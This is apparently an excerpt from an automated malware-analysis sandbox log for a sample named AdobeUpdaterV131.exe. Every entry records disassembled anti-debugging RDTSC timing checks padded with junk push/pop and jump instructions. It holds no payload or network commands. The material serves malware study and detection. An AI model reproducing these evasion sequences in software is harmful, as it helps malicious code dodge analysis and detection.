Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 951529 second address: 95155F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F09D0D9C3E2h 0x0000000d jmp 00007F09D0D9C3E0h 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jnc 00007F09D0D9C3D6h 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9517BA second address: 9517DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9517DB second address: 9517E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9517E1 second address: 9517E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9532FA second address: 953332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F09D0D9C3E9h 0x0000000b popad 0x0000000c jmp 00007F09D0D9C3E8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 95957F second address: 959585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 958863 second address: 958875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F09D0D9C3D8h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 958875 second address: 95887A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 958DA2 second address: 958DB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F09D0D9C3D6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 958DB1 second address: 958DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F09D0731CB6h 0x00000013 jmp 00007F09D0731CB8h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 958DED second address: 958E01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9590C2 second address: 9590CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9590CD second address: 9590E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F09D0D9C3E6h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9590E9 second address: 959158 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F09D0731CB5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F09D0731CB8h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007F09D0731CB9h 0x0000001a jmp 00007F09D0731CB1h 0x0000001f jmp 00007F09D0731CABh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 959158 second address: 95917B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F09D0D9C3EEh 0x0000000b jmp 00007F09D0D9C3E6h 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 95917B second address: 959180 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 95DD2C second address: 95DD3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 js 00007F09D0D9C3D6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 95DFE3 second address: 95DFFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 jg 00007F09D0731CCCh 0x0000000c pushad 0x0000000d jne 00007F09D0731CA6h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 90B21B second address: 90B252 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F09D0D9C3E8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 90B252 second address: 90B297 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a movsx edi, si 0x0000000d mov ebx, dword ptr [ebp+1247E35Eh] 0x00000013 mov edx, dword ptr [ebp+122D355Ch] 0x00000019 add eax, ebx 0x0000001b jns 00007F09D0731CABh 0x00000021 nop 0x00000022 jmp 00007F09D0731CACh 0x00000027 push eax 0x00000028 pushad 0x00000029 pushad 0x0000002a jnl 00007F09D0731CA6h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 90B297 second address: 90B29F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 90B29F second address: 90B2A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 95E296 second address: 95E2AD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F09D0D9C3DDh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9619FC second address: 961A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 961A00 second address: 961A04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 961C10 second address: 961C14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 961C14 second address: 961C1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 961C1A second address: 961C20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 961C20 second address: 961C26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 961C26 second address: 961C2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 961C2C second address: 961C30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 96951D second address: 969525 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 969525 second address: 969529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 969529 second address: 96952D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 96A022 second address: 96A039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jl 00007F09D0D9C3E0h 0x0000000d jmp 00007F09D0D9C3DAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 96A039 second address: 96A041 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 96A041 second address: 96A045 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 96A644 second address: 96A64A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 96A927 second address: 96A92D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 96B1EC second address: 96B1F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 96CBC5 second address: 96CBE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 js 00007F09D0D9C3D6h 0x0000000b jns 00007F09D0D9C3D6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jnp 00007F09D0D9C3D6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 96CBE1 second address: 96CBE7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 971622 second address: 971627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 971627 second address: 97162D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 97162D second address: 971631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 971631 second address: 97164D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e popad 0x0000000f jl 00007F09D0731CA6h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 974AFD second address: 974B2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E3h 0x00000007 jmp 00007F09D0D9C3E6h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 974F39 second address: 974F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b push ebx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9750E5 second address: 9750F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F09D0D9C3DCh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9750F6 second address: 975100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F09D0731CA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 975100 second address: 975114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 97528E second address: 97529C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F09D0731CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 97D89E second address: 97D8A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 97D8A6 second address: 97D8AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 97DB3C second address: 97DB40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 97DE28 second address: 97DE30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 97DFB0 second address: 97DFB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 97DFB5 second address: 97DFE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB3h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c js 00007F09D0731CA6h 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 jmp 00007F09D0731CABh 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 97DFE8 second address: 97DFFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F09D0D9C3E2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 97DFFE second address: 97E002 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 97E16E second address: 97E184 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 97F3AC second address: 97F3B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 97D34B second address: 97D369 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jbe 00007F09D0D9C3D6h 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 jnl 00007F09D0D9C3D6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 985B4B second address: 985B57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F09D0731CA6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9968EA second address: 9968F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 998822 second address: 998845 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007F09D0731CB9h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 998845 second address: 99884B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 99884B second address: 998851 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9A4D1F second address: 9A4D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9A4D23 second address: 9A4D2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9A4D2F second address: 9A4D56 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F09D0D9C3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F09D0D9C3E6h 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9A4D56 second address: 9A4D83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F09D0731CB9h 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 jnp 00007F09D0731CA6h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9B2552 second address: 9B256F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E7h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9B256F second address: 9B2573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9B2573 second address: 9B2577 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9B119D second address: 9B11A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9B11A3 second address: 9B11C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 jl 00007F09D0D9C3FBh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F09D0D9C3E7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9B11C8 second address: 9B11CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9B12ED second address: 9B12F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9B12F1 second address: 9B130E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F09D0731CB4h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9B1475 second address: 9B1479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9B1479 second address: 9B1487 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F09D0731CAEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9B170C second address: 9B1710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9B1710 second address: 9B1722 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CAEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9B1722 second address: 9B1728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9B1886 second address: 9B189A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9B189A second address: 9B18A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9B18A0 second address: 9B18AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F09D0731CA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9B18AA second address: 9B18C4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F09D0D9C3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F09D0D9C3DCh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9B18C4 second address: 9B18E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F09D0731CB1h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9B18E1 second address: 9B18EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F09D0D9C3D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9B7111 second address: 9B711B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F09D0731CA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe RDTSC instruction interceptor: First address: 9C5FF9 second address: 9C601D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F09D0D9C3E9h 0x0000000a pop esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
